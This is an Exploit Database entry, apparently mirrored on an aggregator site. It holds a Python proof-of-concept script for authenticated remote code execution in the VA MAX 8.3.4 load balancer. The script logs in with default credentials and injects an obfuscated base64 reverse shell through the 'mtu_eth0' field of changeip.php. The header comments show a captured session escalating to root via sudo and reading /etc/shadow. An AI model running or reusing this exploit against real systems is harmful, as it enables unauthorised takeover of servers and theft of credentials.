VA MAX 8.3.4 – (Authenticated) Remote Code Execution

• Exploit Database
• 14 阅读

• 作者： Cody Sixteen
  日期： 2019-02-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46348/

• root@nippur:/home/c/src/nippur# cat vamax3.py
  #!/usr/bin/env python
  # quick poc for postauth rce bug in va max 8.3.4
  #
  # more:
  # https://code610.blogspot.com
  #
  # 10.02.2019
  #
  
  # p.s.
  #
  # listening on [any] 4444 ...
  # 192.168.1.126: inverse host lookup failed: Unknown host
  # connect to [192.168.1.160] from (UNKNOWN) [192.168.1.126] 58894
  # sh: no job control in this shell
  # sh-4.1$ id
  # id
  # uid=48(apache) gid=48(apache) groups=48(apache),10(wheel),18(dialout)
  # sh-4.1$ cat /etc/shadow
  # cat /etc/shadow
  # cat: /etc/shadow: Permission denied
  # sh-4.1$
  # (...)
  # sh-4.1$ sudo -l
  # sudo -l
  # Matching Defaults entries for apache on this host:
  # syslog_goodpri=debug, env_reset,
  # secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
  #
  # User apache may run the following commands on this host:
  # (ALL) NOPASSWD: ALL
  # sh-4.1$ sudo su
  # sudo su
  # id
  # uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
  # head -n1 /etc/shadow
  # root:$6$dNu030j/gSf.5(...)4IlAEGpzHv0:15392:0:99999:7:::
  #
  #
  # o/
  
  import datetime, time
  import requests
  from requests.auth import HTTPBasicAuth
  
  # defines
  dateTime = datetime.datetime.now()
  timestamp = int(time.mktime(dateTime.timetuple()))
  
  remote_host = 'http://192.168.1.126:9080'
  our_user = 'loadbalancer'
  our_passwd = 'loadbalancer'
  
  # go
  sess = requests.session()
  logme = sess.post(remote_host, auth=HTTPBasicAuth(our_user, our_passwd))
  logmeresp = logme.text
  
  
  print '\n\tsmall poc for VA MAX 8.3.4\n'
  
  
  
  # try to log in
  if '<title>Load Balancer Administration System' in logmeresp:
  print '[+] using credentials: %s : %s' % ( our_user, our_passwd )
  print '[+] our timestamp: %s' % ( timestamp )
  
  print '[+] proceed.'
  
  getme = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
  dogetme = sess.get(getme, auth=HTTPBasicAuth(our_user, our_passwd))
  getmeresp = dogetme.text
  
  
  payload = "h4x;echo cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9J TkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTkyLjE2OC4xLjE2MCIsNDQ0NCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3 MuZHVwMihzLmZpbGVubygpLDEpOyBvcy5kdXAyKHMuZmlsZW5vKCksMik7cD1zdWJwcm9jZXNzLmNhbGwoWyIvYmluL3NoIiwiLWkiXSk7Jwo=| base64 -d | sh;#"
  
  #payload = "h4x;telnet 192.168.1.160 4444;#"
  #payload = ';id>/tmp/id.id.id'
  # print '[i] using payload:', payload
  
  data_req = {
  'eth0' : '192.168.1.126/24',
  'mtu_eth0' : '1500' + payload, # >.<
  'eth1' : '',
  'mtu_eth1' : '1500',
  'eth2' : '',
  'mtu_eth2' : '1500',
  'eth3' : '',
  'mtu_eth3' : '1500',
  'go' : 'Configure+Interfaces'
  }
  shLink = remote_host + '/lbadmin/config/changeip.php?action=modip&l=e&t=' + str(timestamp)
  shellWe = sess.post(shLink, data=data_req, auth=HTTPBasicAuth(our_user, our_passwd))
  shResp = shellWe.text
  
  # check sudo -l now :>
  print '\n\nThanks.Bye.\n'